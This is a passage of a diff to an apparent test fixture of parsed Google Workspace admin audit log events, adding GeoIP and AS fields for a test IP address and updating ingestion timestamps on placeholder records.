"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_KEYWORD", @@ -1351,6 +1579,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1360,7 +1600,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004900900Z", + "ingested": "2021-12-14T14:44:54.651977048Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LANGUAGE", @@ -1422,6 +1662,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1431,7 +1683,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004904600Z", + "ingested": "2021-12-14T14:44:54.651977412Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LOCATION", @@ -1493,6 +1745,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1502,7 +1766,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004909Z", + "ingested": "2021-12-14T14:44:54.651977773Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ORGANIZATION", @@ -1564,6 +1828,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1573,7 +1849,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004942700Z", + "ingested": "2021-12-14T14:44:54.651978136Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_PHONE_NUMBER", @@ -1635,6 +1911,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1644,7 +1932,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004946700Z", + "ingested": "2021-12-14T14:44:54.651978595Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_EMAIL", @@ -1706,6 +1994,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1715,7 +2015,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004951500Z", + "ingested": "2021-12-14T14:44:54.651978951Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_PHONE", @@ -1777,6 +2077,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1786,7 +2098,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004955300Z", + "ingested": "2021-12-14T14:44:54.651979341Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_RELATION", @@ -1848,6 +2160,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1857,7 +2181,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004960300Z", + "ingested": "2021-12-14T14:44:54.651979703Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ADDRESS", @@ -1919,6 +2243,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1928,7 +2264,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004966200Z", + "ingested": "2021-12-14T14:44:54.651980066Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "provider": "admin", "action": "CREATE_EMAIL_MONITOR", @@ -1990,6 +2326,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1999,7 +2347,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004972Z", + "ingested": "2021-12-14T14:44:54.651980425Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}", "provider": "admin", "action": "CREATE_DATA_TRANSFER_REQUEST", @@ -2061,6 +2409,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2070,7 +2430,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004977700Z", + "ingested": "2021-12-14T14:44:54.651980777Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "GRANT_DELEGATED_ADMIN_PRIVILEGES", @@ -2132,6 +2492,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2141,7 +2513,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004997400Z", + "ingested": "2021-12-14T14:44:54.651981130Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "provider": "admin", "action": "DELETE_ACCOUNT_INFO_DUMP", @@ -2203,6 +2575,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2212,7 +2596,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005003Z", + "ingested": "2021-12-14T14:44:54.651981487Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}", "provider": "admin", "action": "DELETE_EMAIL_MONITOR", @@ -2274,6 +2658,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2283,7 +2679,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005008300Z", + "ingested": "2021-12-14T14:44:54.651981843Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "provider": "admin", "action": "DELETE_MAILBOX_DUMP", @@ -2345,6 +2741,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2354,7 +2762,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005013600Z", + "ingested": "2021-12-14T14:44:54.651982197Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_FIRST_NAME", @@ -2416,6 +2824,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2425,7 +2845,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005019200Z", + "ingested": "2021-12-14T14:44:54.651991818Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}", "provider": "admin", "action": "GMAIL_RESET_USER", @@ -2487,6 +2907,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2496,7 +2928,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005024600Z", + "ingested": "2021-12-14T14:44:54.651992630Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LAST_NAME", @@ -2558,6 +2990,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2567,7 +3011,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005029900Z", + "ingested": "2021-12-14T14:44:54.651993484Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "MAIL_ROUTING_DESTINATION_ADDED", @@ -2629,6 +3073,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2638,7 +3094,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005038500Z", + "ingested": "2021-12-14T14:44:54.651993893Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "MAIL_ROUTING_DESTINATION_REMOVED", @@ -2700,6 +3156,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2709,7 +3177,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005044100Z", + "ingested": "2021-12-14T14:44:54.651994261Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "provider": "admin", "action": "ADD_NICKNAME", @@ -2771,6 +3239,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2780,7 +3260,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005049600Z", + "ingested": "2021-12-14T14:44:54.651994623Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "provider": "admin", "action": "REMOVE_NICKNAME", @@ -2842,6 +3322,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2851,7 +3343,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005054900Z", + "ingested": "2021-12-14T14:44:54.651994988Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD", @@ -2913,6 +3405,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2922,7 +3426,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005060200Z", + "ingested": "2021-12-14T14:44:54.651995356Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_ON_NEXT_LOGIN", @@ -2978,6 +3482,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2987,7 +3503,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005065600Z", + "ingested": "2021-12-14T14:44:54.651995733Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}", "provider": "admin", "action": "DOWNLOAD_PENDING_INVITES_LIST", @@ -3043,6 +3559,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3052,7 +3580,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005069500Z", + "ingested": "2021-12-14T14:44:54.651996095Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_RECOVERY_EMAIL", @@ -3114,6 +3642,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3123,7 +3663,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005074500Z", + "ingested": "2021-12-14T14:44:54.651996459Z", "original": 